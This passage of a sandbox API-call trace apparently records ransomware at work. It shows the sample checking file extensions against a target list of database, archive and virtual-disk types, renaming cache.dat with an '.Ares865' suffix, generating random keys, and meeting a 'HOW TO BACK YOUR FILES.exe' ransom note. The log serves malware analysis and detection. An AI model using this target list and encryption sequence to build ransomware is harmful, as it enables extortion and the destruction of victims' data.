(lpString1="dat", lpString2="bak") returned 1 [0085.647] lstrlenW (lpString="ba_") returned 3 [0085.647] lstrcmpiW (lpString1="dat", lpString2="ba_") returned 1 [0085.647] lstrlenW (lpString="dbb") returned 3 [0085.647] lstrcmpiW (lpString1="dat", lpString2="dbb") returned -1 [0085.647] lstrlenW (lpString="vmdk") returned 4 [0085.647] lstrcmpiW (lpString1=".dat", lpString2="vmdk") returned -1 [0085.647] lstrlenW (lpString="rar") returned 3 [0085.647] lstrcmpiW (lpString1="dat", lpString2="rar") returned -1 [0085.647] lstrlenW (lpString="zip") returned 3 [0085.647] lstrcmpiW (lpString1="dat", lpString2="zip") returned -1 [0085.647] lstrlenW (lpString="tgz") returned 3 [0085.647] lstrcmpiW (lpString1="dat", lpString2="tgz") returned -1 [0085.647] lstrlenW (lpString="vbox") returned 4 [0085.647] lstrcmpiW (lpString1=".dat", lpString2="vbox") returned -1 [0085.647] lstrlenW (lpString="vdi") returned 3 [0085.647] lstrcmpiW (lpString1="dat", lpString2="vdi") returned -1 [0085.647] lstrlenW (lpString="vhd") returned 3 [0085.647] lstrcmpiW (lpString1="dat", lpString2="vhd") returned -1 [0085.647] lstrlenW (lpString="vhdx") returned 4 [0085.647] lstrcmpiW (lpString1=".dat", lpString2="vhdx") returned -1 [0085.647] lstrlenW (lpString="avhd") returned 4 [0085.647] lstrcmpiW (lpString1=".dat", lpString2="avhd") returned -1 [0085.647] lstrlenW (lpString="db") returned 2 [0085.647] lstrcmpiW (lpString1="at", lpString2="db") returned -1 [0085.647] lstrlenW (lpString="db2") returned 3 [0085.647] lstrcmpiW (lpString1="dat", lpString2="db2") returned -1 [0085.647] lstrlenW (lpString="db3") returned 3 [0085.648] lstrcmpiW (lpString1="dat", lpString2="db3") returned -1 [0085.648] lstrlenW (lpString="dbf") returned 3 [0085.648] lstrcmpiW (lpString1="dat", lpString2="dbf") returned -1 [0085.648] lstrlenW (lpString="mdf") returned 3 [0085.648] lstrcmpiW (lpString1="dat", lpString2="mdf") returned -1 [0085.648] lstrlenW (lpString="mdb") returned 3 [0085.648] lstrcmpiW (lpString1="dat", lpString2="mdb") returned -1 [0085.648] lstrlenW (lpString="sql") returned 3 [0085.648] lstrcmpiW (lpString1="dat", lpString2="sql") returned -1 [0085.648] lstrlenW (lpString="sqlite") returned 6 [0085.648] lstrcmpiW (lpString1="he.dat", lpString2="sqlite") returned -1 [0085.648] lstrlenW (lpString="sqlite3") returned 7 [0085.648] lstrcmpiW (lpString1="che.dat", lpString2="sqlite3") returned -1 [0085.648] lstrlenW (lpString="sqlitedb") returned 8 [0085.648] lstrcmpiW (lpString1="ache.dat", lpString2="sqlitedb") returned -1 [0085.648] lstrlenW (lpString="xml") returned 3 [0085.648] lstrcmpiW (lpString1="dat", lpString2="xml") returned -1 [0085.648] lstrlenW (lpString="$er") returned 3 [0085.648] lstrcmpiW (lpString1="dat", lpString2="$er") returned 1 [0085.648] lstrlenW (lpString="4dd") returned 3 [0085.648] lstrcmpiW (lpString1="dat", lpString2="4dd") returned 1 [0085.648] lstrlenW (lpString="4dl") returned 3 [0085.648] lstrcmpiW (lpString1="dat", lpString2="4dl") returned 1 [0085.648] lstrlenW (lpString="^^^") returned 3 [0085.648] lstrcmpiW (lpString1="dat", lpString2="^^^") returned 1 [0085.648] lstrlenW (lpString="abs") returned 3 [0085.648] lstrcmpiW (lpString1="dat", lpString2="abs") returned 1 [0085.648] lstrlenW (lpString="abx") returned 3 [0085.648] lstrcmpiW (lpString1="dat", lpString2="abx") returned 1 [0085.648] lstrlenW (lpString="accdb") returned 5 [0085.648] lstrcmpiW (lpString1="e.dat", lpString2="accdb") returned 1 [0085.648] lstrlenW (lpString="accdc") returned 5 [0085.648] lstrcmpiW (lpString1="e.dat", lpString2="accdc") returned 1 [0085.648] lstrlenW (lpString="accde") returned 5 [0085.648] lstrcmpiW (lpString1="e.dat", lpString2="accde") returned 1 [0085.648] lstrlenW (lpString="accdr") returned 5 [0085.648] lstrcmpiW (lpString1="e.dat", lpString2="accdr") returned 1 [0085.648] lstrlenW (lpString="accdt") returned 5 [0085.649] lstrcmpiW (lpString1="e.dat", lpString2="accdt") returned 1 [0085.649] lstrlenW (lpString="accdw") returned 5 [0085.649] lstrcmpiW (lpString1="e.dat", lpString2="accdw") returned 1 [0085.649] lstrlenW (lpString="accft") returned 5 [0085.649] lstrcmpiW (lpString1="e.dat", lpString2="accft") returned 1 [0085.649] lstrlenW (lpString="adb") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0085.649] lstrlenW (lpString="adb") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0085.649] lstrlenW (lpString="ade") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="ade") returned 1 [0085.649] lstrlenW (lpString="adf") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="adf") returned 1 [0085.649] lstrlenW (lpString="adn") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="adn") returned 1 [0085.649] lstrlenW (lpString="adp") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="adp") returned 1 [0085.649] lstrlenW (lpString="alf") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="alf") returned 1 [0085.649] lstrlenW (lpString="ask") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="ask") returned 1 [0085.649] lstrlenW (lpString="btr") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="btr") returned 1 [0085.649] lstrlenW (lpString="cat") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="cat") returned 1 [0085.649] lstrlenW (lpString="cdb") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="cdb") returned 1 [0085.649] lstrlenW (lpString="ckp") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="ckp") returned 1 [0085.649] lstrlenW (lpString="cma") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="cma") returned 1 [0085.649] lstrlenW (lpString="cpd") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="cpd") returned 1 [0085.649] lstrlenW (lpString="dacpac") returned 6 [0085.649] lstrcmpiW (lpString1="he.dat", lpString2="dacpac") returned 1 [0085.649] lstrlenW (lpString="dad") returned 3 [0085.649] lstrcmpiW (lpString1="dat", lpString2="dad") returned 1 [0085.649] lstrlenW (lpString="dadiagrams") returned 10 [0085.649] lstrlenW (lpString="daschema") returned 8 [0085.650] lstrcmpiW (lpString1="ache.dat", lpString2="daschema") returned -1 [0085.650] lstrlenW (lpString="db-journal") returned 10 [0085.650] lstrlenW (lpString="db-shm") returned 6 [0085.650] lstrcmpiW (lpString1="he.dat", lpString2="db-shm") returned 1 [0085.650] lstrlenW (lpString="db-wal") returned 6 [0085.650] lstrcmpiW (lpString1="he.dat", lpString2="db-wal") returned 1 [0085.650] lstrlenW (lpString="dbc") returned 3 [0085.650] lstrcmpiW (lpString1="dat", lpString2="dbc") returned -1 [0085.650] lstrlenW (lpString="dbs") returned 3 [0085.650] lstrcmpiW (lpString1="dat", lpString2="dbs") returned -1 [0085.650] lstrlenW (lpString="dbt") returned 3 [0085.650] lstrcmpiW (lpString1="dat", lpString2="dbt") returned -1 [0085.650] lstrlenW (lpString="dbv") returned 3 [0085.650] lstrcmpiW (lpString1="dat", lpString2="dbv") returned -1 [0085.650] lstrlenW (lpString="dbx") returned 3 [0085.650] lstrcmpiW (lpString1="dat", lpString2="dbx") returned -1 [0085.650] lstrlenW (lpString="dcb") returned 3 [0085.650] lstrcmpiW (lpString1="dat", lpString2="dcb") returned -1 [0085.650] lstrlenW (lpString="dct") returned 3 [0085.650] lstrcmpiW (lpString1="dat", lpString2="dct") returned -1 [0085.650] lstrlenW (lpString="dcx") returned 3 [0085.650] lstrcmpiW (lpString1="dat", lpString2="dcx") returned -1 [0085.650] lstrlenW (lpString="ddl") returned 3 [0085.650] lstrcmpiW (lpString1="dat", lpString2="ddl") returned -1 [0085.650] lstrlenW (lpString="dlis") returned 4 [0085.650] lstrcmpiW (lpString1=".dat", lpString2="dlis") returned -1 [0085.650] lstrlenW (lpString="dp1") returned 3 [0085.650] lstrcmpiW (lpString1="dat", lpString2="dp1") returned -1 [0085.650] lstrlenW (lpString="dqy") returned 3 [0085.650] lstrcmpiW (lpString1="dat", lpString2="dqy") returned -1 [0085.650] lstrlenW (lpString="dsk") returned 3 [0085.650] lstrcmpiW (lpString1="dat", lpString2="dsk") returned -1 [0085.650] lstrlenW (lpString="dsn") returned 3 [0085.650] lstrcmpiW (lpString1="dat", lpString2="dsn") returned -1 [0085.650] lstrlenW (lpString="dtsx") returned 4 [0085.650] lstrcmpiW (lpString1=".dat", lpString2="dtsx") returned -1 [0085.650] lstrlenW (lpString="dxl") returned 3 [0085.650] lstrcmpiW (lpString1="dat", lpString2="dxl") returned -1 [0085.651] lstrlenW (lpString="eco") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="eco") returned -1 [0085.651] lstrlenW (lpString="ecx") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="ecx") returned -1 [0085.651] lstrlenW (lpString="edb") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="edb") returned -1 [0085.651] lstrlenW (lpString="epim") returned 4 [0085.651] lstrcmpiW (lpString1=".dat", lpString2="epim") returned -1 [0085.651] lstrlenW (lpString="fcd") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="fcd") returned -1 [0085.651] lstrlenW (lpString="fdb") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="fdb") returned -1 [0085.651] lstrlenW (lpString="fic") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="fic") returned -1 [0085.651] lstrlenW (lpString="flexolibrary") returned 12 [0085.651] lstrlenW (lpString="fm5") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="fm5") returned -1 [0085.651] lstrlenW (lpString="fmp") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="fmp") returned -1 [0085.651] lstrlenW (lpString="fmp12") returned 5 [0085.651] lstrcmpiW (lpString1="e.dat", lpString2="fmp12") returned -1 [0085.651] lstrlenW (lpString="fmpsl") returned 5 [0085.651] lstrcmpiW (lpString1="e.dat", lpString2="fmpsl") returned -1 [0085.651] lstrlenW (lpString="fol") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="fol") returned -1 [0085.651] lstrlenW (lpString="fp3") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="fp3") returned -1 [0085.651] lstrlenW (lpString="fp4") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="fp4") returned -1 [0085.651] lstrlenW (lpString="fp5") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="fp5") returned -1 [0085.651] lstrlenW (lpString="fp7") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="fp7") returned -1 [0085.651] lstrlenW (lpString="fpt") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="fpt") returned -1 [0085.651] lstrlenW (lpString="frm") returned 3 [0085.651] lstrcmpiW (lpString1="dat", lpString2="frm") returned -1 [0085.651] lstrlenW (lpString="gdb") returned 3 [0085.652] lstrcmpiW (lpString1="dat", lpString2="gdb") returned -1 [0085.652] lstrlenW (lpString="gdb") returned 3 [0085.652] lstrcmpiW (lpString1="dat", lpString2="gdb") returned -1 [0085.652] lstrlenW (lpString="grdb") returned 4 [0085.652] lstrcmpiW (lpString1=".dat", lpString2="grdb") returned -1 [0085.652] lstrlenW (lpString="gwi") returned 3 [0085.652] lstrcmpiW (lpString1="dat", lpString2="gwi") returned -1 [0085.652] lstrlenW (lpString="hdb") returned 3 [0085.652] lstrcmpiW (lpString1="dat", lpString2="hdb") returned -1 [0085.652] lstrlenW (lpString="his") returned 3 [0085.652] lstrcmpiW (lpString1="dat", lpString2="his") returned -1 [0085.652] lstrlenW (lpString="ib") returned 2 [0085.652] lstrcmpiW (lpString1="at", lpString2="ib") returned -1 [0085.652] lstrlenW (lpString="idb") returned 3 [0085.652] lstrcmpiW (lpString1="dat", lpString2="idb") returned -1 [0085.652] lstrlenW (lpString="ihx") returned 3 [0085.652] lstrcmpiW (lpString1="dat", lpString2="ihx") returned -1 [0085.652] lstrlenW (lpString="itdb") returned 4 [0085.652] lstrcmpiW (lpString1=".dat", lpString2="itdb") returned -1 [0085.652] lstrlenW (lpString="itw") returned 3 [0085.652] lstrcmpiW (lpString1="dat", lpString2="itw") returned -1 [0085.652] lstrlenW (lpString="jet") returned 3 [0085.652] lstrcmpiW (lpString1="dat", lpString2="jet") returned -1 [0085.652] lstrlenW (lpString="jtx") returned 3 [0085.652] lstrcmpiW (lpString1="dat", lpString2="jtx") returned -1 [0085.652] lstrlenW (lpString="kdb") returned 3 [0085.652] lstrcmpiW (lpString1="dat", lpString2="kdb") returned -1 [0085.652] lstrlenW (lpString="kexi") returned 4 [0085.652] lstrcmpiW (lpString1=".dat", lpString2="kexi") returned -1 [0085.652] lstrlenW (lpString="kexic") returned 5 [0085.652] lstrcmpiW (lpString1="e.dat", lpString2="kexic") returned -1 [0085.652] lstrlenW (lpString="kexis") returned 5 [0085.652] lstrcmpiW (lpString1="e.dat", lpString2="kexis") returned -1 [0085.652] lstrlenW (lpString="lgc") returned 3 [0085.652] lstrcmpiW (lpString1="dat", lpString2="lgc") returned -1 [0085.652] lstrlenW (lpString="lwx") returned 3 [0085.652] lstrcmpiW (lpString1="dat", lpString2="lwx") returned -1 [0085.652] lstrlenW (lpString="maf") returned 3 [0085.652] lstrcmpiW (lpString1="dat", lpString2="maf") returned -1 [0085.653] lstrlenW (lpString="maq") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="maq") returned -1 [0085.653] lstrlenW (lpString="mar") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="mar") returned -1 [0085.653] lstrlenW (lpString="marshal") returned 7 [0085.653] lstrcmpiW (lpString1="che.dat", lpString2="marshal") returned -1 [0085.653] lstrlenW (lpString="mas") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="mas") returned -1 [0085.653] lstrlenW (lpString="mav") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="mav") returned -1 [0085.653] lstrlenW (lpString="maw") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="maw") returned -1 [0085.653] lstrlenW (lpString="mdbhtml") returned 7 [0085.653] lstrcmpiW (lpString1="che.dat", lpString2="mdbhtml") returned -1 [0085.653] lstrlenW (lpString="mdn") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="mdn") returned -1 [0085.653] lstrlenW (lpString="mdt") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="mdt") returned -1 [0085.653] lstrlenW (lpString="mfd") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="mfd") returned -1 [0085.653] lstrlenW (lpString="mpd") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="mpd") returned -1 [0085.653] lstrlenW (lpString="mrg") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="mrg") returned -1 [0085.653] lstrlenW (lpString="mud") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="mud") returned -1 [0085.653] lstrlenW (lpString="mwb") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="mwb") returned -1 [0085.653] lstrlenW (lpString="myd") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="myd") returned -1 [0085.653] lstrlenW (lpString="ndf") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="ndf") returned -1 [0085.653] lstrlenW (lpString="nnt") returned 3 [0085.653] lstrcmpiW (lpString1="dat", lpString2="nnt") returned -1 [0085.653] lstrlenW (lpString="nrmlib") returned 6 [0085.653] lstrcmpiW (lpString1="he.dat", lpString2="nrmlib") returned -1 [0085.653] lstrlenW (lpString="ns2") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="ns2") returned -1 [0085.654] lstrlenW (lpString="ns3") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="ns3") returned -1 [0085.654] lstrlenW (lpString="ns4") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="ns4") returned -1 [0085.654] lstrlenW (lpString="nsf") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="nsf") returned -1 [0085.654] lstrlenW (lpString="nv") returned 2 [0085.654] lstrcmpiW (lpString1="at", lpString2="nv") returned -1 [0085.654] lstrlenW (lpString="nv2") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="nv2") returned -1 [0085.654] lstrlenW (lpString="nwdb") returned 4 [0085.654] lstrcmpiW (lpString1=".dat", lpString2="nwdb") returned -1 [0085.654] lstrlenW (lpString="nyf") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="nyf") returned -1 [0085.654] lstrlenW (lpString="odb") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="odb") returned -1 [0085.654] lstrlenW (lpString="odb") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="odb") returned -1 [0085.654] lstrlenW (lpString="oqy") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="oqy") returned -1 [0085.654] lstrlenW (lpString="ora") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="ora") returned -1 [0085.654] lstrlenW (lpString="orx") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="orx") returned -1 [0085.654] lstrlenW (lpString="owc") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="owc") returned -1 [0085.654] lstrlenW (lpString="p96") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="p96") returned -1 [0085.654] lstrlenW (lpString="p97") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="p97") returned -1 [0085.654] lstrlenW (lpString="pan") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="pan") returned -1 [0085.654] lstrlenW (lpString="pdb") returned 3 [0085.654] lstrcmpiW (lpString1="dat", lpString2="pdb") returned -1 [0085.655] lstrlenW (lpString="pdm") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="pdm") returned -1 [0085.655] lstrlenW (lpString="pnz") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="pnz") returned -1 [0085.655] lstrlenW (lpString="qry") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="qry") returned -1 [0085.655] lstrlenW (lpString="qvd") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="qvd") returned -1 [0085.655] lstrlenW (lpString="rbf") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="rbf") returned -1 [0085.655] lstrlenW (lpString="rctd") returned 4 [0085.655] lstrcmpiW (lpString1=".dat", lpString2="rctd") returned -1 [0085.655] lstrlenW (lpString="rod") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="rod") returned -1 [0085.655] lstrlenW (lpString="rodx") returned 4 [0085.655] lstrcmpiW (lpString1=".dat", lpString2="rodx") returned -1 [0085.655] lstrlenW (lpString="rpd") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="rpd") returned -1 [0085.655] lstrlenW (lpString="rsd") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="rsd") returned -1 [0085.655] lstrlenW (lpString="sas7bdat") returned 8 [0085.655] lstrcmpiW (lpString1="ache.dat", lpString2="sas7bdat") returned -1 [0085.655] lstrlenW (lpString="sbf") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="sbf") returned -1 [0085.655] lstrlenW (lpString="scx") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="scx") returned -1 [0085.655] lstrlenW (lpString="sdb") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="sdb") returned -1 [0085.655] lstrlenW (lpString="sdc") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="sdc") returned -1 [0085.655] lstrlenW (lpString="sdf") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="sdf") returned -1 [0085.655] lstrlenW (lpString="sis") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="sis") returned -1 [0085.655] lstrlenW (lpString="spq") returned 3 [0085.655] lstrcmpiW (lpString1="dat", lpString2="spq") returned -1 [0085.655] lstrlenW (lpString="te") returned 2 [0085.655] lstrcmpiW (lpString1="at", lpString2="te") returned -1 [0085.656] lstrlenW (lpString="teacher") returned 7 [0085.656] lstrcmpiW (lpString1="che.dat", lpString2="teacher") returned -1 [0085.656] lstrlenW (lpString="tmd") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="tmd") returned -1 [0085.656] lstrlenW (lpString="tps") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="tps") returned -1 [0085.656] lstrlenW (lpString="trc") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="trc") returned -1 [0085.656] lstrlenW (lpString="trc") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="trc") returned -1 [0085.656] lstrlenW (lpString="trm") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="trm") returned -1 [0085.656] lstrlenW (lpString="udb") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="udb") returned -1 [0085.656] lstrlenW (lpString="udl") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="udl") returned -1 [0085.656] lstrlenW (lpString="usr") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="usr") returned -1 [0085.656] lstrlenW (lpString="v12") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="v12") returned -1 [0085.656] lstrlenW (lpString="vis") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="vis") returned -1 [0085.656] lstrlenW (lpString="vpd") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="vpd") returned -1 [0085.656] lstrlenW (lpString="vvv") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="vvv") returned -1 [0085.656] lstrlenW (lpString="wdb") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="wdb") returned -1 [0085.656] lstrlenW (lpString="wmdb") returned 4 [0085.656] lstrcmpiW (lpString1=".dat", lpString2="wmdb") returned -1 [0085.656] lstrlenW (lpString="wrk") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="wrk") returned -1 [0085.656] lstrlenW (lpString="xdb") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="xdb") returned -1 [0085.656] lstrlenW (lpString="xld") returned 3 [0085.656] lstrcmpiW (lpString1="dat", lpString2="xld") returned -1 [0085.656] lstrlenW (lpString="xmlff") returned 5 [0085.656] lstrcmpiW (lpString1="e.dat", lpString2="xmlff") returned -1 [0085.656] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.Ares865") returned 85 [0085.657] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.Ares865" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat.ares865"), dwFlags=0x1) returned 1 [0085.658] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.Ares865" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.658] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=262768) returned 1 [0085.658] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.658] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.658] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0085.658] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0085.659] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.659] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.659] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x40570, lpName=0x0) returned 0x15c [0085.661] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x40570) returned 0x420000 [0085.674] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0085.675] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.675] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0085.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0085.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.675] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0085.678] CloseHandle (hObject=0x15c) returned 1 [0085.678] CloseHandle (hObject=0x118) returned 1 [0085.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0085.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.679] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c5c3640, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c5c3640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0085.679] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0085.679] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c5c3640, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c5c3640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0085.679] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0085.679] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0085.679] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\OFFICE", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\OFFICE") returned="C:\\Users\\All Users\\Microsoft\\OFFICE" [0085.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eea60 | out: hHeap=0x2b0000) returned 1 